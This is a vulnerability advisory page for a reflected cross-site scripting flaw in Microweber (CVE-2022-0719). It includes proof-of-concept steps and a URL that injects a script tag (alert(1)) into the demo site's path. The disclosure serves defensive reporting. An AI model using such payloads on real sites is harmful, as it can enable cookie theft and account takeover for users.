Lucene search
Daman-preet-singhBCDCE15B-7F40-4971-A061-C25C6053C312HistoryFeb 20, 2022 - 6:03 a.m.
Cross-site Scripting (XSS) - Reflected
2022-02-2006:03:31
daman-preet-singh
www.huntr.dev
6
0.001 Low
EPSS
Percentile
21.6%
Description
There is a Reflected cross site scripting issue chained using these endpoints:
[1] /admin/content/0/edit
[2] /apiqq</script><script>alert(1)</script>fca4/page
Proof of Concept
- Login to https://demo.microweber.org
- Now visit https://demo.microweber.org/demo/admin/content/0/edit
- Now open this url (in same tab or new):
https://demo.microweber.org/demo/apiqq</script><script>alert(1)</script>fca4/page
The xss payload will be executed in the browser.
Impact
Cross site scripting attacks can lead to cookies stealing (can be chained to account takeover), redirecting users to attackers controlled malicious websites etc
Related
nvd
nvd
CVE-2022-0719
2022-02-23 11:15:07
cve
cve
CVE-2022-0719
2022-02-23 11:15:07
prion
prion
Cross site scripting
2022-02-23 11:15:00
osv
osv
CVE-2022-0719
2022-02-23 11:15:07
Cross-site Scripting in Microweber
2022-02-24 00:00:53
cvelist
cvelist
github
github
Cross-site Scripting in Microweber
2022-02-24 00:00:53